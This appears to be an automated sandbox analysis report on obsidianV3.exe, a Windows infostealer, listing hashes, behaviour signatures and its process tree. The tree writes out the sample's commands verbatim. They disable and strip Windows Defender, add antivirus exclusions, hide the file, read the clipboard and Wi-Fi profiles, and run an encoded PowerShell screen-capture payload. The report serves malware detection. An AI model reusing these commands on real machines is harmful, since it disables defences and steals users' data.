Analysis
-
max time kernel
97s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 19:44
Behavioral task
behavioral1
Sample
obsidianV3.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
obsidianV3.exe
Resource
win10v2004-20241007-en
General
-
Target
obsidianV3.exe
-
Size
10.0MB
-
MD5
66fcd8f921d800b034d43585c9e4aa19
-
SHA1
9c41e4453457a81c9cfbf5693bba1891eca2cc90
-
SHA256
ce7728c21cccce1f5c506e33dceeaae49b797e3b4a2873940452bf5914089107
-
SHA512
b1fe64a465596dbf5a071c3b96135a18a21f78f93ae6b1058c94ca35cb809ec3692c5cf8ba1130e59b45be42e5850f139381d1bb86f94fb285827b3a605a6ae1
-
SSDEEP
196608:JcHY9wfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jQ:UIHziK1piXLGVE4Ue0VJU
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 828 powershell.exe 424 powershell.exe 1376 powershell.exe 2400 powershell.exe 3516 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid Process 1960 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
obsidianV3.exepid Process 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe 1968 obsidianV3.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid Process 216 tasklist.exe 1268 tasklist.exe 432 tasklist.exe 3888 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Processes:
resource yara_rule behavioral2/files/0x0007000000023ca8-21.dat upx behavioral2/memory/1968-25-0x00007FF989650000-0x00007FF989CB3000-memory.dmp upx behavioral2/files/0x0007000000023c9b-27.dat upx behavioral2/files/0x0007000000023ca6-29.dat upx behavioral2/memory/1968-48-0x00007FF99CE40000-0x00007FF99CE4F000-memory.dmp upx behavioral2/files/0x0007000000023ca2-47.dat upx behavioral2/files/0x0007000000023ca1-46.dat upx behavioral2/files/0x0007000000023ca0-45.dat upx behavioral2/files/0x0007000000023c9f-44.dat upx behavioral2/files/0x0007000000023c9e-43.dat upx behavioral2/files/0x0007000000023c9d-42.dat upx behavioral2/files/0x0007000000023c9c-41.dat upx behavioral2/files/0x0007000000023c9a-40.dat upx behavioral2/files/0x0007000000023cad-39.dat upx behavioral2/files/0x0007000000023cac-38.dat upx behavioral2/files/0x0007000000023cab-37.dat upx behavioral2/files/0x0007000000023ca7-34.dat upx behavioral2/files/0x0007000000023ca5-33.dat upx behavioral2/memory/1968-30-0x00007FF99CC20000-0x00007FF99CC47000-memory.dmp upx behavioral2/memory/1968-56-0x00007FF9990B0000-0x00007FF9990C9000-memory.dmp upx behavioral2/memory/1968-55-0x00007FF999340000-0x00007FF99936B000-memory.dmp upx behavioral2/memory/1968-58-0x00007FF999080000-0x00007FF9990A5000-memory.dmp upx behavioral2/memory/1968-60-0x00007FF989D70000-0x00007FF989EEF000-memory.dmp upx behavioral2/memory/1968-62-0x00007FF998240000-0x00007FF998259000-memory.dmp upx behavioral2/memory/1968-64-0x00007FF999070000-0x00007FF99907D000-memory.dmp upx behavioral2/memory/1968-66-0x00007FF994CD0000-0x00007FF994D04000-memory.dmp upx behavioral2/memory/1968-71-0x00007FF988FC0000-0x00007FF98908E000-memory.dmp upx behavioral2/memory/1968-74-0x00007FF99CC20000-0x00007FF99CC47000-memory.dmp upx behavioral2/memory/1968-73-0x00007FF988A80000-0x00007FF988FB3000-memory.dmp upx behavioral2/memory/1968-70-0x00007FF989650000-0x00007FF989CB3000-memory.dmp upx behavioral2/memory/1968-78-0x00007FF998EF0000-0x00007FF998EFD000-memory.dmp upx behavioral2/memory/1968-76-0x00007FF995550000-0x00007FF995564000-memory.dmp upx behavioral2/memory/1968-80-0x00007FF9991E0000-0x00007FF999293000-memory.dmp upx behavioral2/memory/1968-106-0x00007FF999080000-0x00007FF9990A5000-memory.dmp upx behavioral2/memory/1968-207-0x00007FF989D70000-0x00007FF989EEF000-memory.dmp upx behavioral2/memory/1968-317-0x00007FF994CD0000-0x00007FF994D04000-memory.dmp upx behavioral2/memory/1968-333-0x00007FF988FC0000-0x00007FF98908E000-memory.dmp upx behavioral2/memory/1968-336-0x00007FF988A80000-0x00007FF988FB3000-memory.dmp upx behavioral2/memory/1968-353-0x00007FF989D70000-0x00007FF989EEF000-memory.dmp upx behavioral2/memory/1968-347-0x00007FF989650000-0x00007FF989CB3000-memory.dmp upx behavioral2/memory/1968-386-0x00007FF9991E0000-0x00007FF999293000-memory.dmp upx behavioral2/memory/1968-396-0x00007FF994CD0000-0x00007FF994D04000-memory.dmp upx behavioral2/memory/1968-397-0x00007FF988FC0000-0x00007FF98908E000-memory.dmp upx behavioral2/memory/1968-395-0x00007FF999070000-0x00007FF99907D000-memory.dmp upx behavioral2/memory/1968-394-0x00007FF998240000-0x00007FF998259000-memory.dmp upx behavioral2/memory/1968-393-0x00007FF989D70000-0x00007FF989EEF000-memory.dmp upx behavioral2/memory/1968-392-0x00007FF999080000-0x00007FF9990A5000-memory.dmp upx behavioral2/memory/1968-391-0x00007FF9990B0000-0x00007FF9990C9000-memory.dmp upx behavioral2/memory/1968-390-0x00007FF999340000-0x00007FF99936B000-memory.dmp upx behavioral2/memory/1968-389-0x00007FF99CE40000-0x00007FF99CE4F000-memory.dmp upx behavioral2/memory/1968-388-0x00007FF99CC20000-0x00007FF99CC47000-memory.dmp upx behavioral2/memory/1968-387-0x00007FF988A80000-0x00007FF988FB3000-memory.dmp upx behavioral2/memory/1968-385-0x00007FF998EF0000-0x00007FF998EFD000-memory.dmp upx behavioral2/memory/1968-384-0x00007FF995550000-0x00007FF995564000-memory.dmp upx behavioral2/memory/1968-372-0x00007FF989650000-0x00007FF989CB3000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEcmd.exepid Process 1768 PING.EXE 2212 cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid Process 3064 WMIC.exe 1984 WMIC.exe 3960 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 828 powershell.exe 828 powershell.exe 2400 powershell.exe 2400 powershell.exe 2400 powershell.exe 3516 powershell.exe 3516 powershell.exe 4448 powershell.exe 4448 powershell.exe 4448 powershell.exe 3080 powershell.exe 3080 powershell.exe 3080 powershell.exe 424 powershell.exe 424 powershell.exe 424 powershell.exe 3812 powershell.exe 3812 powershell.exe 3812 powershell.exe 1376 powershell.exe 1376 powershell.exe 1244 powershell.exe 1244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exeWMIC.exepowershell.exepowershell.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 1268 tasklist.exe Token: SeIncreaseQuotaPrivilege 2928 WMIC.exe Token: SeSecurityPrivilege 2928 WMIC.exe Token: SeTakeOwnershipPrivilege 2928 WMIC.exe Token: SeLoadDriverPrivilege 2928 WMIC.exe Token: SeSystemProfilePrivilege 2928 WMIC.exe Token: SeSystemtimePrivilege 2928 WMIC.exe Token: SeProfSingleProcessPrivilege 2928 WMIC.exe Token: SeIncBasePriorityPrivilege 2928 WMIC.exe Token: SeCreatePagefilePrivilege 2928 WMIC.exe Token: SeBackupPrivilege 2928 WMIC.exe Token: SeRestorePrivilege 2928 WMIC.exe Token: SeShutdownPrivilege 2928 WMIC.exe Token: SeDebugPrivilege 2928 WMIC.exe Token: SeSystemEnvironmentPrivilege 2928 WMIC.exe Token: SeRemoteShutdownPrivilege 2928 WMIC.exe Token: SeUndockPrivilege 2928 WMIC.exe Token: SeManageVolumePrivilege 2928 WMIC.exe Token: 33 2928 WMIC.exe Token: 34 2928 WMIC.exe Token: 35 2928 WMIC.exe Token: 36 2928 WMIC.exe Token: SeDebugPrivilege 828 powershell.exe Token: SeDebugPrivilege 2400 powershell.exe Token: SeIncreaseQuotaPrivilege 2928 WMIC.exe Token: SeSecurityPrivilege 2928 WMIC.exe Token: SeTakeOwnershipPrivilege 2928 WMIC.exe Token: SeLoadDriverPrivilege 2928 WMIC.exe Token: SeSystemProfilePrivilege 2928 WMIC.exe Token: SeSystemtimePrivilege 2928 WMIC.exe Token: SeProfSingleProcessPrivilege 2928 WMIC.exe Token: SeIncBasePriorityPrivilege 2928 WMIC.exe Token: SeCreatePagefilePrivilege 2928 WMIC.exe Token: SeBackupPrivilege 2928 WMIC.exe Token: SeRestorePrivilege 2928 WMIC.exe Token: SeShutdownPrivilege 2928 WMIC.exe Token: SeDebugPrivilege 2928 WMIC.exe Token: SeSystemEnvironmentPrivilege 2928 WMIC.exe Token: SeRemoteShutdownPrivilege 2928 WMIC.exe Token: SeUndockPrivilege 2928 WMIC.exe Token: SeManageVolumePrivilege 2928 WMIC.exe Token: 33 2928 WMIC.exe Token: 34 2928 WMIC.exe Token: 35 2928 WMIC.exe Token: 36 2928 WMIC.exe Token: SeIncreaseQuotaPrivilege 3064 WMIC.exe Token: SeSecurityPrivilege 3064 WMIC.exe Token: SeTakeOwnershipPrivilege 3064 WMIC.exe Token: SeLoadDriverPrivilege 3064 WMIC.exe Token: SeSystemProfilePrivilege 3064 WMIC.exe Token: SeSystemtimePrivilege 3064 WMIC.exe Token: SeProfSingleProcessPrivilege 3064 WMIC.exe Token: SeIncBasePriorityPrivilege 3064 WMIC.exe Token: SeCreatePagefilePrivilege 3064 WMIC.exe Token: SeBackupPrivilege 3064 WMIC.exe Token: SeRestorePrivilege 3064 WMIC.exe Token: SeShutdownPrivilege 3064 WMIC.exe Token: SeDebugPrivilege 3064 WMIC.exe Token: SeSystemEnvironmentPrivilege 3064 WMIC.exe Token: SeRemoteShutdownPrivilege 3064 WMIC.exe Token: SeUndockPrivilege 3064 WMIC.exe Token: SeManageVolumePrivilege 3064 WMIC.exe Token: 33 3064 WMIC.exe Token: 34 3064 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
obsidianV3.exeobsidianV3.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 668 wrote to memory of 1968 668 obsidianV3.exe 84 PID 668 wrote to memory of 1968 668 obsidianV3.exe 84 PID 1968 wrote to memory of 4952 1968 obsidianV3.exe 87 PID 1968 wrote to memory of 4952 1968 obsidianV3.exe 87 PID 1968 wrote to memory of 1828 1968 obsidianV3.exe 88 PID 1968 wrote to memory of 1828 1968 obsidianV3.exe 88 PID 1968 wrote to memory of 4880 1968 obsidianV3.exe 89 PID 1968 wrote to memory of 4880 1968 obsidianV3.exe 89 PID 1968 wrote to memory of 3184 1968 obsidianV3.exe 93 PID 1968 wrote to memory of 3184 1968 obsidianV3.exe 93 PID 1968 wrote to memory of 4320 1968 obsidianV3.exe 95 PID 1968 wrote to memory of 4320 1968 obsidianV3.exe 95 PID 1828 wrote to memory of 828 1828 cmd.exe 97 PID 1828 wrote to memory of 828 1828 cmd.exe 97 PID 3184 wrote to memory of 1268 3184 cmd.exe 98 PID 3184 wrote to memory of 1268 3184 cmd.exe 98 PID 4320 wrote to memory of 2928 4320 cmd.exe 99 PID 4320 wrote to memory of 2928 4320 cmd.exe 99 PID 4952 wrote to memory of 2400 4952 cmd.exe 100 PID 4952 wrote to memory of 2400 4952 cmd.exe 100 PID 4880 wrote to memory of 1352 4880 cmd.exe 101 PID 4880 wrote to memory of 1352 4880 cmd.exe 101 PID 1968 wrote to memory of 4060 1968 obsidianV3.exe 155 PID 1968 wrote to memory of 4060 1968 obsidianV3.exe 155 PID 4060 wrote to memory of 4404 4060 cmd.exe 158 PID 4060 wrote to memory of 4404 4060 cmd.exe 158 PID 1968 wrote to memory of 2408 1968 obsidianV3.exe 106 PID 1968 wrote to memory of 2408 1968 obsidianV3.exe 106 PID 2408 wrote to memory of 2984 2408 cmd.exe 108 PID 2408 wrote to memory of 2984 2408 cmd.exe 108 PID 1968 wrote to memory of 4472 1968 obsidianV3.exe 109 PID 1968 wrote to memory of 4472 1968 obsidianV3.exe 109 PID 4472 wrote to memory of 3064 4472 cmd.exe 111 PID 4472 wrote to memory of 3064 4472 cmd.exe 111 PID 1968 wrote to memory of 436 1968 obsidianV3.exe 114 PID 1968 wrote to memory of 436 1968 obsidianV3.exe 114 PID 436 wrote to memory of 1984 436 cmd.exe 116 PID 436 wrote to memory of 1984 436 cmd.exe 116 PID 1968 wrote to memory of 4488 1968 obsidianV3.exe 117 PID 1968 wrote to memory of 4488 1968 obsidianV3.exe 117 PID 1968 wrote to memory of 4308 1968 obsidianV3.exe 119 PID 1968 wrote to memory of 4308 1968 obsidianV3.exe 119 PID 4308 wrote to memory of 3516 4308 cmd.exe 121 PID 4308 wrote to memory of 3516 4308 cmd.exe 121 PID 4488 wrote to memory of 3376 4488 cmd.exe 122 PID 4488 wrote to memory of 3376 4488 cmd.exe 122 PID 1968 wrote to memory of 1664 1968 obsidianV3.exe 123 PID 1968 wrote to memory of 1664 1968 obsidianV3.exe 123 PID 1968 wrote to memory of 4576 1968 obsidianV3.exe 124 PID 1968 wrote to memory of 4576 1968 obsidianV3.exe 124 PID 4576 wrote to memory of 432 4576 cmd.exe 127 PID 4576 wrote to memory of 432 4576 cmd.exe 127 PID 1664 wrote to memory of 3888 1664 cmd.exe 128 PID 1664 wrote to memory of 3888 1664 cmd.exe 128 PID 1968 wrote to memory of 4252 1968 obsidianV3.exe 130 PID 1968 wrote to memory of 4252 1968 obsidianV3.exe 130 PID 1968 wrote to memory of 1136 1968 obsidianV3.exe 129 PID 1968 wrote to memory of 1136 1968 obsidianV3.exe 129 PID 1968 wrote to memory of 1652 1968 obsidianV3.exe 131 PID 1968 wrote to memory of 1652 1968 obsidianV3.exe 131 PID 1968 wrote to memory of 4640 1968 obsidianV3.exe 165 PID 1968 wrote to memory of 4640 1968 obsidianV3.exe 165 PID 1968 wrote to memory of 2240 1968 obsidianV3.exe 135 PID 1968 wrote to memory of 2240 1968 obsidianV3.exe 135 -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\obsidianV3.exe"C:\Users\Admin\AppData\Local\Temp\obsidianV3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Users\Admin\AppData\Local\Temp\obsidianV3.exe"C:\Users\Admin\AppData\Local\Temp\obsidianV3.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\obsidianV3.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\obsidianV3.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('try again', 0, 'error ', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('try again', 0, 'error ', 0+16);close()"4⤵PID:1352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:2984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\obsidianV3.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\obsidianV3.exe"4⤵
- Views/modifies file attributes
PID:3376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:1136
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:3496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1652
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4640
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2240 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2820
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjA